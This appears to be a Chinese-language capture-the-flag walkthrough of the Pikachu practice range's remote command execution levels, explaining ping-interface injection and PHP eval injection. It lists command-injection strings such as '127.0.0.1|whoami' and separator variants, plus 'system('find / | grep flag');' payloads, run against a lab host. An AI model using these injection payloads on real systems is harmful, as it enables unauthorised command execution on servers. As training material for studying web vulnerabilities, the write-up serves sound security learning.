皮卡丘RCE靶场通关攻略

皮卡丘RCE靶场通关攻略

文章目录

• 皮卡丘RCE靶场通关攻略
• • [RCE(remote command/code execute)概述](#RCE(remote command/code execute)概述)
  • 远程系统命令执行
  • 启动环境
  • 漏洞练习
  • • 第一关exec "ping"
    • [第二关 exec "eval"](#第二关 exec "eval")

RCE(remote command/code execute)概述

RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。

远程系统命令执行

一般出现这种漏洞，是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口

比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上

一般会给用户提供一个ping操作的web界面，用户从web界面输入目标IP，提交后，后台会对该IP地址进行一次ping测试，并返回测试结果。 而，如果，设计者在完成该功能时，没有做严格的安全控制，则可能会导致攻击者通过该接口提交"意想不到"的命令，从而让后台进行执行，从而控制整个后台服务器

启动环境

启动靶场获得映射端口

这边地址是10.9.47.6:36162对它进行访问

漏洞练习

第一关exec "ping"

先输入地址尝试ping一下

ping完之后发现没反应

那就用我们命令注入测试语句试一下127.0.0.1|pwd

可以发现能看到目录说明存在该漏洞

接下来利用漏洞找到flag|find / |grep flag

接下来上传flag就通关了

下面是一些ping常用的注入命令

ping 127.0.0.1
127.0.0.1|whoami 
ping 127.0.0.1|whoami
127.0.0.1&whoami
127.0.0.1&&whoami 
127.0.0.1;whoami
127.0.0.1||whoami
127.0.0.0.1||whoami
127.0.0.0.1|whoami

第二关 exec "eval"

进入第二关这个是一个PHP代码的RCE利用

我们输入system函数看看能不能执行系统命令system('pwd');

发现执行成功了说明存在该漏洞，我们用漏洞找到flagsystem('find / | grep flag');

flag就找到了